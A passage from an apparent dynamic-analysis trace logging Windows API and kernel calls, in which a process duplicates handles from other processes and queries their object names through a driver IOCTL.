0x1a [0239.624] ZwQueryObject (in: Handle=0x90, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880053c85a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880053c85a4) returned 0xc0000004 [0239.624] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xfffff8a001f6bb20 [0239.624] ZwQueryObject (in: Handle=0x90, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a001f6bb20, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a001f6bb20, ReturnLength=0x0) returned 0x0 [0239.624] ExFreePoolWithTag (P=0xfffff8a001f6bb20, Tag=0x0) [0239.624] ObfDereferenceObject (Object=0xfffffa800317f870) returned 0x1 [0239.624] KeUnstackDetachProcess (ApcState=0xfffff880053c85c8) [0239.624] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.624] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.624] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.624] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.624] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.624] PsAcquireProcessExitSynchronization () returned 0x0 [0239.624] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0) [0239.624] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800317f870, HandleInformation=0x0) returned 0x0 [0239.624] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.624] PsReleaseProcessExitSynchronization () returned 0x2 [0239.624] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x1a [0239.624] ObQueryNameString (in: Object=0xfffffa800317f870, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.624] ObfDereferenceObject (Object=0xfffffa800317f870) returned 0x1 [0239.624] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.624] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.624] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x748) returned 0xc4 [0239.625] GetCurrentProcess () returned 0xffffffffffffffff [0239.625] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.625] CloseHandle (hObject=0xc4) returned 1 [0239.625] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.625] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1d4c50 [0239.625] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.625] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.625] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.625] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0239.625] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.625] PsAcquireProcessExitSynchronization () returned 0x0 [0239.625] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0) [0239.625] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80118c4250, HandleInformation=0x0) returned 0x0 [0239.625] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.625] PsReleaseProcessExitSynchronization () returned 0x2 [0239.625] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x1a [0239.625] ObQueryNameString (in: Object=0xfffffa80118c4250, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.625] ObfDereferenceObject (Object=0xfffffa80118c4250) returned 0x133 [0239.625] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.625] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.625] CloseHandle (hObject=0xc0) returned 1 [0239.626] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x748) returned 0xc0 [0239.626] GetCurrentProcess () returned 0xffffffffffffffff [0239.626] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x58, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.626] CloseHandle (hObject=0xc0) returned 1 [0239.626] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.626] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.626] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.626] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.626] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.626] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x1a, lpOverlapped=0x0) returned 1 [0239.626] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.626] PsAcquireProcessExitSynchronization () returned 0x0 [0239.626] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0) [0239.626] ObReferenceObjectByHandle (in: Handle=0x58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003674090, HandleInformation=0x0) returned 0x0 [0239.626] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.626] PsReleaseProcessExitSynchronization () returned 0x2 [0239.626] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x1a [0239.626] ObQueryNameString (in: Object=0xfffffa8003674090, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.626] ObfDereferenceObject (Object=0xfffffa8003674090) returned 0x52d [0239.626] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.627] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.627] CloseHandle (hObject=0xc4) returned 1 [0239.627] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x748) returned 0xc4 [0239.627] GetCurrentProcess () returned 0xffffffffffffffff [0239.627] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x3c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.627] CloseHandle (hObject=0xc4) returned 1 [0239.627] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.627] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.627] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.627] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.627] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.627] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.627] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.627] PsAcquireProcessExitSynchronization () returned 0x0 [0239.627] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0) [0239.627] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80024102b0, HandleInformation=0x0) returned 0x0 [0239.627] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.627] PsReleaseProcessExitSynchronization () returned 0x2 [0239.627] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x1a [0239.627] ObQueryNameString (in: Object=0xfffffa80024102b0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.627] ObfDereferenceObject (Object=0xfffffa80024102b0) returned 0x2 [0239.627] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.628] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.628] CloseHandle (hObject=0xc0) returned 1 [0239.628] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x748) returned 0xc0 [0239.628] GetCurrentProcess () returned 0xffffffffffffffff [0239.628] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.628] CloseHandle (hObject=0xc0) returned 1 [0239.628] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.628] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80) returned 0x1d4c50 [0239.628] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.628] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.628] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.628] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.628] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.628] PsAcquireProcessExitSynchronization () returned 0x0 [0239.628] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85d0) [0239.628] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021719c0, HandleInformation=0x0) returned 0x0 [0239.628] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.628] PsReleaseProcessExitSynchronization () returned 0x2 [0239.628] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x1a [0239.628] ObQueryNameString (in: Object=0xfffffa80021719c0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.629] ObfDereferenceObject (Object=0xfffffa80021719c0) returned 0x2 [0239.629] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.629] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.629] CloseHandle (hObject=0xc4) returned 1 [0239.629] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc4 [0239.629] GetCurrentProcess () returned 0xffffffffffffffff [0239.629] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xbc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.629] CloseHandle (hObject=0xc4) returned 1 [0239.629] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.629] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.629] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.629] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.629] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.629] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.629] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.630] PsAcquireProcessExitSynchronization () returned 0x0 [0239.630] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0239.630] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80025e9060, HandleInformation=0x0) returned 0x0 [0239.630] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.630] PsReleaseProcessExitSynchronization () returned 0x2 [0239.630] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x22 [0239.630] ObQueryNameString (in: Object=0xfffffa80025e9060, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.630] ObfDereferenceObject (Object=0xfffffa80025e9060) returned 0x3 [0239.630] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.630] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.630] CloseHandle (hObject=0xc0) returned 1 [0239.630] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc0 [0239.630] GetCurrentProcess () returned 0xffffffffffffffff [0239.630] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.630] CloseHandle (hObject=0xc0) returned 1 [0239.630] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.630] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.630] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.630] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.630] NtQueryInformationThread (in: ThreadHandle=0xc4, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000022 [0239.630] CloseHandle (hObject=0xc4) returned 1 [0239.630] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc4 [0239.631] GetCurrentProcess () returned 0xffffffffffffffff [0239.631] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.631] CloseHandle (hObject=0xc4) returned 1 [0239.631] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.631] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1d4c50 [0239.631] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.631] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.631] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.631] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.631] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.631] PsAcquireProcessExitSynchronization () returned 0x0 [0239.631] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0239.631] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa1560, HandleInformation=0x0) returned 0x0 [0239.631] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.631] PsReleaseProcessExitSynchronization () returned 0x2 [0239.631] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x22 [0239.631] ObQueryNameString (in: Object=0xfffffa8001fa1560, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.631] ObfDereferenceObject (Object=0xfffffa8001fa1560) returned 0x2 [0239.631] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.631] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.631] CloseHandle (hObject=0xc0) returned 1 [0239.631] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc0 [0239.632] GetCurrentProcess () returned 0xffffffffffffffff [0239.632] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.632] CloseHandle (hObject=0xc0) returned 1 [0239.632] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.632] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1ecb50 [0239.632] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1ecb50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x1ecb50, ReturnLength=0x0) returned 0x0 [0239.632] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ecb50 | out: hHeap=0x1b0000) returned 1 [0239.632] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.632] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.632] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.632] PsAcquireProcessExitSynchronization () returned 0x0 [0239.632] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0239.632] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002fb1830, HandleInformation=0x0) returned 0x0 [0239.632] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.632] PsReleaseProcessExitSynchronization () returned 0x2 [0239.632] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x22 [0239.632] ObQueryNameString (in: Object=0xfffffa8002fb1830, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.632] ObfDereferenceObject (Object=0xfffffa8002fb1830) returned 0x3 [0239.632] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.632] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.632] CloseHandle (hObject=0xc4) returned 1 [0239.632] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x5d0) returned 0xc4 [0239.633] GetCurrentProcess () returned 0xffffffffffffffff [0239.633] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.633] CloseHandle (hObject=0xc4) returned 1 [0239.633] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.633] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80) returned 0x1ecb50 [0239.633] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1ecb50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x1ecb50, ReturnLength=0x0) returned 0x0 [0239.633] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ecb50 | out: hHeap=0x1b0000) returned 1 [0239.633] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.633] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.633] PsLookupProcessByProcessId (in: ProcessId=0x5d0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.633] PsAcquireProcessExitSynchronization () returned 0x0 [0239.633] KeStackAttachProcess (in: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026b0b30, ApcState=0xfffff880053c85d0) [0239.633] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0042b9060, HandleInformation=0x0) returned 0x0 [0239.633] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.633] 